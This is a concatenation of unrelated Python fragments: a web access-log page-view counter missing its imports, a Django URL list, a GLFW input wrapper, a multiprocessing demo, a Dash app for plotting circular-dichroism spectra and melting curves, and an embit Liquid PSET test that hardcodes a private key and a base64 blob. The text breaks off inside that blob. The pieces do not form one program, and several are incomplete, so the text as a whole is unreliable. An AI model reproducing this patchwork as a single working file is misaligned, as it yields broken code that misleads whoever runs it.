# top 10 most-viewed articles: percent of views with each seen search engine keyword
# (full list at bottom of output)
# top 10 most-viewed articles: percent of views with each seen platform-os
# (full list at bottom of output)
# top 10 most-viewed articles: percent of views with each seen platform-form-factor
# (full list at bottom of output)
def get_weekday_from_iso_date(iso_date):
    """Return the weekday name (e.g. 'Monday') for an ISO 'YYYY-MM-DD...' string."""
    day = datetime.date.fromisoformat(iso_date[:10])
    return calendar.day_name[day.weekday()]
# Input is a space-delimited access-log CSV on stdin with these columns:
field_names = [
    'date-time', 'visitor-day-id', 'http-verb', 'uri', 'proto', 'resp-code',
    'resp-size', 'referrer-domain', 'search-engine', 'search-engine-keywords',
    'platform-os', 'platform-form-factor'
]
# as of October 2021, consider any .html file an "article"
# (gallery pages do not have same URL pattern as articles, so
# we need to use a more general pattern here)
#article_uri_pattern = re.compile("^/20[0-9][0-9]/.+\.html$")
article_uri_pattern = re.compile("^.+\.html$")
csv_reader = csv.DictReader(sys.stdin, fieldnames=field_names, delimiter=' ')
# Aggregation maps, all keyed by ISO date. The inner visitor-id dicts are
# used as sets: ids map to None; only key membership/count matters.
view_visitors_by_day = dict()
views_by_day = dict()
view_visitors_by_article_by_day = dict()
all_visitors_by_day = dict()
for row in csv_reader:
    # ISO date prefix of the timestamp, e.g. '2018-11-01'.
    date = row['date-time'][0:10]
    # count only successful html page GET requests as a "page view"
    if row['http-verb'] == 'GET' and row['resp-code'][0:1] in ['2','3'] and (row['uri'].endswith('/') or row['uri'].lower().endswith('.html')):
        if not date in views_by_day:
            views_by_day[date] = 0
        views_by_day[date] += 1
        if not date in view_visitors_by_day:
            view_visitors_by_day[date] = dict()
        view_visitors_by_day[date][row['visitor-day-id']] = None
        # consider the home page "/" as an article
        if row['uri'] == '/' or row['uri'].lower() == '/index.html' or article_uri_pattern.match(row['uri']):
            if not date in view_visitors_by_article_by_day:
                view_visitors_by_article_by_day[date] = dict()
            if not row['uri'] in view_visitors_by_article_by_day[date]:
                view_visitors_by_article_by_day[date][row['uri']] = dict()
            view_visitors_by_article_by_day[date][row['uri']][row['visitor-day-id']] = None
    # every request, page view or not, counts toward "all visitors"
    if not date in all_visitors_by_day:
        all_visitors_by_day[date] = dict()
    all_visitors_by_day[date][row['visitor-day-id']] = None
    #print("at %s (%s) saw %s" % (date, row['date-time'], row['visitor-day-id']))
# --- Report output ---
print("Successful page views by day:")
for date in sorted(views_by_day):
    day_name = get_weekday_from_iso_date(date)
    print("%s %s - %d" % (day_name, date, views_by_day[date]))
print("")
print("Number of visitors with at least one successful page view by day:")
for date in sorted(view_visitors_by_day):
    day_name = get_weekday_from_iso_date(date)
    print("%s %s - %d" % (day_name, date, len(view_visitors_by_day[date])))
print("")
print("Number of visitors with at least one HTTP request by day:")
for date in sorted(all_visitors_by_day):
    day_name = get_weekday_from_iso_date(date)
    print("%s %s - %d" % (day_name, date, len(all_visitors_by_day[date])))
print("")
article_days = dict()
print("Unique visitors per article by day:")
for date in sorted(view_visitors_by_article_by_day):
    day_name = get_weekday_from_iso_date(date)
    # Per-day visitor counts per article, printed most-visited first.
    d = dict()
    for article in view_visitors_by_article_by_day[date]:
        d[article] = len(view_visitors_by_article_by_day[date][article])
    # thanks to https://stackoverflow.com/a/20948781
    day_article_visitors = [(k, d[k]) for k in sorted(d, key=d.get, reverse=True)]
    for article, visitors in day_article_visitors:
        article_day = "%s %s - %s" % (day_name, date, article)
        print("%s: %d" % (article_day, visitors))
        article_days[article_day] = visitors
print("")
print("Top 10 articles by unique visitors by day:")
for article_day in sorted(article_days, key=article_days.get, reverse=True)[0:10]:
    print("%s: %d" % (article_day, article_days[article_day]))
print("")
from django.conf.urls import url
from . import views
# URL routes for this app.
urlpatterns = [
    url(r'^$', views.index, name='index'),
    # NOTE(review): these two patterns are unanchored at the end, so e.g.
    # "/timestamp" also matches "^time" -- confirm that is intended.
    url(r"^time", views.disp_time, name='time'),
    url(r"^csv", views.disp_csv, name='csv'),
]
|
from ...Core.Input import Input
from typing import Tuple
import glfw
class WindowsInput(Input):
    """GLFW-backed input polling for the Windows platform."""

    @staticmethod
    def IsKeyPressed(keyCode: int) -> bool:
        # A key counts as pressed while held (PRESS) or auto-repeating.
        glfwKey = WindowsInput.PI_KC_To_GLFW_KC(keyCode)
        state = glfw.get_key(Input.GetNativeWindow(), glfwKey)
        return state in (glfw.PRESS, glfw.REPEAT)

    @staticmethod
    def IsMouseButtonPressed(button: int) -> bool:
        glfwButton = WindowsInput.PI_MBC_To_GLFW_MBC(button)
        return glfw.get_mouse_button(Input.GetNativeWindow(), glfwButton) == glfw.PRESS

    @staticmethod
    def GetMousePos() -> Tuple[float, float]:
        return glfw.get_cursor_pos(Input.GetNativeWindow())

    @staticmethod
    def GetMouseX() -> float:
        return WindowsInput.GetMousePos()[0]

    @staticmethod
    def GetMouseY() -> float:
        return WindowsInput.GetMousePos()[1]

    @staticmethod
    def PI_KC_To_GLFW_KC(keyCode: int) -> int:
        # Engine key codes currently mirror GLFW's directly.
        return keyCode

    @staticmethod
    def PI_MBC_To_GLFW_MBC(button: int) -> int:
        # Engine mouse-button codes currently mirror GLFW's directly.
        return button
|
'''
Create multiple child processes using the multiprocessing module.
'''
import os
from multiprocessing import Process
# Code executed in each child process.
def run_proc(name):
    """Report the child's name and process id."""
    message = 'Child process %s (%s) Running...' % (name, os.getpid())
    print(message)
if __name__ == '__main__':
    print('Parent process %s.' % os.getpid())
    # Spawn five children, each printing its own pid.
    for i in range(5):
        p = Process(target=run_proc, args=(str(i),))
        print('Process will start.')
        p.start()
    # NOTE(review): the join is outside the loop, so only the last-created
    # process is joined; earlier children may still be running here.
    p.join()
    print('Process end.')
|
import pandas as pd
import math, os, sys
"""
Usage: ./cd_spectra.py <folder>
Plots a folder of CD spectra and melting curves and sets up a local
server to display them in an interactive browser window.
"""
def parse_ascii(filename):
    """Parse an exported CD-spectrometer ASCII file into a long-format DataFrame.

    Scans the header for axis units (XUNITS/YUNITS/Y2UNITS), the start of
    the XYDATA section, and an optional enzyme-concentration line
    (presumably in uM -- TODO confirm units), then reads the tab-separated
    data and normalizes to molar ellipticity when a concentration is given.
    """
    start = 0          # index of the first data row (line after XYDATA)
    xunits = None
    yunits = None
    y2units = None
    enzyme_conc = None
    with open(filename, 'r') as f:
        print('reading file ', filename)
        for index, line in enumerate(f):
            if line.startswith('XUNITS'):
                xunits = line.split()[1]
            elif line.startswith('YUNITS'):
                yunits = line.split()[1]
            elif line.startswith('Y2UNITS'):
                y2units = line.split()[1]
            elif line.startswith('XYDATA'):
                start = index + 1
            elif line.startswith('enzyme') or line.startswith('ENZYME'):
                enzyme_conc = line.split()[1]
    # Keep only the unit columns that were actually present in the header.
    col_list = []
    for col in [xunits, yunits, y2units]:
        if col:
            col_list.append(col)
    data = pd.read_csv(filename,names=col_list,sep='\t',skiprows=start)
    if enzyme_conc:
        print('Normalizing to molar elipticity for ', str(filename))
        #data[yunits] = 100 * (data[yunits]/float(1000)) / ((float(enzyme_conc) *
        #float(10**-6)) * (2) )
        coef = 0.001 / 1000 * 1000 / 10 # Coefficient that convert mDeg*L*/mol/cm to 10^3*Deg*cm^2/dmol
        # NOTE(review): the divisor 2 looks like a path length or
        # molecularity factor -- confirm against the experimental setup.
        data['Molar Elipticity'] = coef * data[yunits] / (float(enzyme_conc) * 10**-6 ) / float(2)
    else:
        data['Molar Elipticity'] = data[yunits]
    # Long format: one row per (measurement, x-axis variable) pair.
    return pd.melt(data,id_vars=[yunits,y2units,'Molar Elipticity'])
def collect_spectra(folder):
    """Parse every '.txt' ASCII spectrum file in `folder` and return one
    concatenated long-format DataFrame (empty DataFrame if none found).

    Each row is tagged with the source file path in a 'filename' column.
    """
    filepaths = []
    for file in os.listdir(folder):
        if file.split('.')[-1] == 'txt':
            filepaths.append(os.path.join(folder, file))
    frames = []
    for f in filepaths:
        if f.endswith('.txt'):
            df = parse_ascii(f)
            df['filename'] = f
            frames.append(df)
    # Concatenate once at the end: pd.concat inside the loop copies all
    # previously accumulated rows on every iteration (quadratic).
    return pd.concat(frames) if frames else pd.DataFrame()
def theta(T, Tm, dH, R):
    """Two-state folded fraction at temperature T (van 't Hoff model).

    T and Tm are absolute temperatures; dH is presumably in kcal/mol,
    matching the gas constant used below. The R argument is ignored and
    overwritten (kept for signature compatibility with curve_fit usage).
    """
    # Assume molecularity of 1 for now
    R = .001987203611  # gas constant, kcal/(mol*K)
    # Bug fix: the original read `(dH / R) ((1 / T) - (1 / Tm))`, which
    # attempts to *call* the float (dH / R) and raises TypeError; the
    # multiplication operator was missing.
    x = (dH / R) * ((1 / T) - (1 / Tm))
    psi = 1 / (1 + math.exp(x))
    """
    For molecularity of 2, the equation would be
    1 - (e**x)/4) (sqrt(1 + 8 e**-x) - 1)
    """
    return psi
import dash, dash_table
import dash_core_components as dcc
import dash_html_components as html
import plotly.graph_objs as go
from itertools import cycle
from flask_caching import Cache
from uuid import uuid4
import scipy.optimize as opt
# Standard Dash example stylesheet.
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
app = dash.Dash(__name__, external_stylesheets=external_stylesheets)
# Simple in-memory cache attached to the Flask server backing Dash.
CACHE_CONFIG= {
    'CACHE_TYPE': 'simple',
}
cache= Cache()
cache.init_app(app.server, config=CACHE_CONFIG)
# Folder of spectra to plot is given as the first CLI argument.
data = collect_spectra(sys.argv[1])
def update_spectra_graph(data):
    """Build one Scatter line trace per source file from the wavelength
    ('NANOMETERS') rows of the melted spectra DataFrame."""
    df = data[data['variable']=='NANOMETERS']
    traces = []
    # Group by the column name rather than a 1-element list: pandas >= 2.0
    # yields tuple group keys for list groupers, which would break the
    # `name.split` call below.
    for name, group in df.groupby('filename'):
        points = go.Scatter(
            x = group['value'],
            y = group['Molar Elipticity'],
            mode='lines',
            name=name.split('/')[-1]  # legend label: file basename
        )
        traces.append(points)
    return traces
def update_melt_graph(data):
    """Build one Scatter marker trace per source file from the
    'Temperature' rows of the melted spectra DataFrame."""
    df = data[data['variable']=='Temperature']
    traces =[]
    # Group by the column name rather than a 1-element list: pandas >= 2.0
    # yields tuple group keys for list groupers, which would break the
    # `name.split` call below.
    for name, group in df.groupby('filename'):
        points = go.Scatter(
            x = group['value'],
            y = group['Molar Elipticity'],
            mode = 'markers',
            name=name.split('/')[-1]  # legend label: file basename
        )
        #optimizedParameters, pcov = opt.curve_fit(theta,
        #group['variable'], group['Molar Elipticity'])
        traces.append(points)
    return traces
def serve_layout():
    """Build the page layout: one graph of CD spectra, one of melt curves.

    Defined as a function (and assigned to app.layout below) so Dash
    rebuilds the layout on each page load.
    """
    session_id = str(uuid4())  # NOTE(review): currently unused
    return html.Div([
        html.Div([
            dcc.Graph(id='spectra',
                figure={
                    'data':update_spectra_graph(data),
                    'layout':go.Layout(
                        xaxis={
                            'title':'Wavelength (nm)'
                        },
                        yaxis={'title':'Molar elipticity'},
                        margin={'l':40,'b':40,'t':100,'r':10},
                        hovermode='closest',
                        title='CD Spectra',
                    )
                }
            ),
            dcc.Graph(id='melt',
                figure={
                    'data':update_melt_graph(data),
                    'layout':go.Layout(
                        xaxis={'title':'Temperature (C)'},
                        yaxis={'title':'Molar elipticity'},
                        margin={'l':40,'b':40,'t':100,'r':10},
                        hovermode='closest',
                        title='Melting curves',
                    )
                }
            ),
        ])
    ])
# Assign the function itself (not its result) so the layout is rebuilt
# on every page load.
app.layout = serve_layout
if __name__ == '__main__':
    app.run_server(debug=True)
|
from unittest import TestCase
from embit.ec import PrivateKey
from embit.liquid.pset import PSET
from embit.hashes import tagged_hash
from embit.liquid import slip77
import threading
mbkey = PrivateKey.from_string("L2U2zGBgimb2vNee3bTw2y936PDJZXq3p7nMXEWuPP5MmpE1nCfv")
B64PSET = "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